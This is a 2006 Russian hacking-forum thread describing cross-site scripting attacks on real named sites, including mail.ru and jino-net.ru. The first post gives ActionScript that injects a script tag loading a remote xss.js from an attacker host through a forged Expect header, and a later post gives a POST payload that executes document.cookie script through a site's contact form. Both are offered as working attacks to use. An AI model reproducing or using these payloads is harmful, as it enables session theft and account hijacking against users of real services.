Xss на mail.ru через expect заголовок.

Discussion in 'Уязвимости' started by Go0o$E, 16 Oct 2006.

  1. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
    Создание Flash:

    [​IMG]

    PHP:
    var req:LoadVars=new LoadVars(); 
    req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); 
    req.decode("XSS"); 
    req.send("http://www.mail.ru","POST");
    Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.

    Уменьшаем размер и экспортируем Flash: File->Export->Export Image.



    [​IMG]

    Вот в принципе и все. Думаю вы знаете что дальше делать.

    P.S. Еще работает на yandex.ru, nm.ru и icq.com.
     
    #1 Go0o$E, 16 Oct 2006
    Last edited: 16 Oct 2006
    9 people like this.
  2. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    гыгыгы опера пелеплюнула фаерворкс =) А так метод уже рассматривался и я удивлен, почему же так редко упоминается, ведь пока что тема реально работает. оч рад +
     
  3. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Да уязвимость не нова, но работает еще много где! =)
     
    1 person likes this.
  4. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Post Xss на jino-net.ru

    Так же на actionscript можно проводить xss через post запросы.

    Пример: XSS на jino-net.ru

    PHP:
    var req:LoadVars=new LoadVars();  
    req.decode("subject=spam&name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=&message="); 
    req.send("http://www.jino-net.ru/contacts.phtml?subj=spam","POST");
     
    1 person likes this.